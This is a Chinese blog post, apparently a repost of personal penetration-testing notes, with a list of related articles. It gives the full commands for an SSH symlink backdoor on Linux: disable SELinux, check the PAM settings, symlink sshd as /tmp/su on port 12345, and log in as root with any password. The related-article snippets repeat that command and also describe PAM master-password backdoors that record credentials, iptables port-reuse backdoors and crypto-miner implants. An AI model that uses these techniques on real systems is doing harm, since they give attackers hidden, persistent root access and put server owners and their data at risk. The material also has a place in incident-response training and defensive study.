通过SSH留后门(创建ssh软链接)

已于 2022-05-11 09:03:29 修改
阅读量2.1k 收藏 10
点赞数 1
分类专栏: Linux 渗透测试 文章标签: ssh 运维 linux
于 2022-05-10 11:06:14 首次发布
原文链接:https://www.jianshu.com/p/59d1f1803421
版权

一、修改/etc/selinux/config文件中的SELINUX="" 为 disabled 。

二、判断sshd_config配置中的UsePAM参数是否为yes

cat /etc/ssh/sshd_config

三、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。

四、通过命令创建后门软链接,通过查看端口己监听。

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345

netstat -antlp

五、通过另一台机器ssh进行任意密码登录。

ssh root@192.168.137.130 -p 12345 

本次实验通过学习安全小白团的文章而成功,本次只做一次简单笔记以便日后翻查。

原始链接如下: 

 ​​​​​​​权限维持 | SSH软链接后门 - 简书

songling515010475
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSH软链接后门利用和原理
Jeeseen123的博客
08-23 1297
SSH软链接后门利用和原理 本文由锦行科技的安全研究团队提供,主要介绍SSH软连接后门的利用和相关原理。 00 利用前提 ssh配置中开启了PAM进行身份验证 查看是否使用PAM进行身份验证:cat/etc/ssh/sshd_config|grep UsePAM 01 建立后门 建立软连接后门:ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234 注意:软链接的路径不是绝对的,但名字不是随便命名的,使用命令find/etc/pam.d|xargs grep "pam_r
用IDEA创建一个SSH项目.doc
07-02
IDEA 中创建 SSH 项目的详细步骤和配置 在本文中,我们将详细介绍如何使用 IDEA 创建一个 SSH 项目,包括项目的创建、配置和启动过程。 创建 Maven Web 项目 首先,我们需要在 IDEA 中创建一个新的 Maven 项目。...
Linux>《OpenSSH 守护进程配置文件sshd_config参数usePAM详解》
Else 的博客
06-14 3827
有时候,我们在修改/etc/ssh/sshd_config配置文件时,会将UsePAM设置为no,从而禁用PAM模块,但这种方式会使SSH的各种高级功能变得失效,不建议在生产环境中使用。以上几个小标题基本涵盖了usepam的主要方面,通过阅读此文可深入了解usepam的基本知识,包括PAM模型、usepam开启导致无法远程登录及产生原因、usepam的作用及重要性、usepam的意义、usepam yes选取导致无法登录的问题及解决办法、usepami、usepam no等诸多内容。
ssh 登陆慢
mixboot
09-24 269
vim /etc/ssh/sshd_config #UsePAM yes UsePAM no 参考: 1.使用ssh连接到我的一台服务器需要20秒以上才能启动
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
05-07 2138
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
利用iptable实现ssh端口复用后门
qq_68163788的博客
11-20 1366
Linux系统中,可以使用iptables来实现SSH端口复用后门SSH端口复用后门是一种隐藏在SSH服务中的后门,可以通过修改iptables规则来实现。 首先,需要确保iptables已经安装在系统中。上面的命令中,是指定的用于后门的端口号,是原本的SSH服务端口号。 接下来,需要修改SSH配置文件,将监听端口改为新的端口号。打开SSH配置文件(通常是/etc/ssh/sshd_config),找到Port项,并将原本的SSH端口号改为新的端口号。
【权限维持】Linux&OpenSSH&PAM后门&SSH软链接&公私钥登录
今天是几号的博客
04-16 1553
可以找到以读写方式记录在文件中的SSH后门密码文件的位置,并通过该方法判断是否存在SSH后门。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持。4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即使用万能密码登陆,将用户名密码记录到文件中。
LINUX后门--教程(二)—— SSH软链接后门
W小哥
06-02 4620
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会后门,如果你连这种后门方法都不会,怎么去应急? 不知攻,焉知防 二、添加SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机) ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 ...
渗透测试模拟实战——暴力破解、写入ssh公钥后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
Unix ssh快速后门
10-22
Unix ssh快速后门linux 添加ssh后门ssh后门维持,linux定时任务,按照文档安装配置,可实现linux ssh后门登录
Zabbix如何通过ssh监控获取网络设备数据
09-29
在Zabbix中,我们可以创建一个SSH客户端类型的监控项,通过SSH连接到网络设备,执行特定的命令来获取所需信息。例如,如果我们想要监控光口的状态、利用率和电压,可以编写相应的命令来获取这些数据。 在Zabbix中...
SSH连接工具
02-12
SSH连接工具,windows与linux互传文件,可视化操作很方便。
SSH2框架搭建实例源码
04-25
SSH2框架,全称为Spring、Struts2和Hibernate2的集成框架,是Java Web开发中的一个常见组合。这个实例源码使用的是Spring 3.2、Struts2 2.3.4和Hibernate 4.2这三个框架的较新版本,提供了一个基础的用户登录和用户...
解决ssh7.4升级8.5后环境变量失效和无法登录问题
简云的博客
04-26 668
#生产环境切记不要关闭当前窗口或保证telnet服务开启可以远程登录 1.在/etc/ssh/sshd_config中加入以下两行配置: UsePAM yes PasswordAuthentication yes PermitRootLogin yes 替换更新后的/etc/pam.d/sshd文件,如下: #%PAM-1.0 auth required pam_sepermit.so auth substack password-auth auth in
linux不用命令开启ssh,不用密码也能ssh登陆Linux
weixin_33651906的博客
04-29 334
Linux的一个后门引发对PAM的探究1.1 起因今天在搜索关于Linux下的后门姿势时,发现一条命令如下:ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;经典后门。直接对sshd建立软连接,之后用任意密码登录即可。sshroot@x.x.x.x-p5555这个是大家也经常会用到的命令,但是在好奇心的驱使下,为什么任意密码就可以了?于是搜...
ssh服务端核心配置文件sshd_config详解
杨群的博客
12-18 8086
sh服务端核心配置文件sshd_config详解,常用参数说明
exelce文件打开慢_文件传输利器SFTP,大数据平台获取数据的重要途径之一
weixin_39713538的博客
11-22 283
SFTP 问题解决-----author:茅哥相信对于很多的大数据开发工作人员,特别是数据采集接入人员,对于sftp这一重要组件想必是不陌生的吧,特别是那些众多小文件,需要通过sftp采集数据后解析进入大数据平台的HDFS,入到大数据平台的Hive等库表中。那么在使用SFTP的过程中,必然会出现各种各样的问题,今天茅哥就带大家看看我在实际开发过程碰到的巨坑吧,分享给大家,避免大家少走弯路。为了方便...
SSH软连接后门
weixin_45209228的博客
03-13 347
SSH软连接后门
SSH后门安装
MX的博客
04-28 1557
SSH后门安装 一:前言 通过WinSCP与Linux服务器进行连接,然后配置安装SSH后门,这次实验主要目的通过实践学习熟悉Linux SSH后门的安装过程和步骤。 二:配置SSH后门 2.1:建立连接 利用winSCP工具(也可以选用其他工具)连接已知(即已经渗透成功的服务器)服务器,如图: 连接成功后: 用SecureCRT连接成功后如图: 通过ssh -V查看当前SSH版本 上传带有...
Linux常见的持久化后门汇总1
08-03
1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值